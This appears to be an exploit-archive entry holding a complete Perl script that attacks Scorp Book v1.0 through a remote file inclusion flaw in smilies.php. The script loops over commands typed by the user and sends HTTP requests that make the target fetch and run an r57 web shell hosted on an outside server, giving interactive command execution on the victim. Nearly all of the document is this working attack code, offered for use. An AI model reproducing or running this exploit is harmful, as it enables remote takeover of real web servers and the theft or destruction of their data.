Scorp Book versions 1.0 and below remote file inclusion exploit for versions 1.0 and below.
6ea802ca1d136dd5b0f8fb7fca2096089c0160c29ea7b995ddbb7d29c8ad295d
# [~] Portal : Scorp Book v1.0
# [~] Download : http://www.ectona.org/download/?id=598&s=info
# [~] Author : KaRTaLl | k4rtal@gmail.com
# [~] Class : Remote File Include Exploit
use IO::Socket;
if (@ARGV < 2){
print "
+**********************************************************************+
* *
* # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit *
* *
* # Usage : xpl.pl [Target] [Path] *
* *
* # Example : xpl.pl *
* *
* Vuln & Coded By KaRTaL *
+**********************************************************************+
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
print "\n[~] Please wait ...\n";
print "[~] Shell : ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path."/smilies.php?config=http://kartal.by.ru/r57.txt?/cmd?cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[~] Shell : ";
$cmd = <STDIN>;
}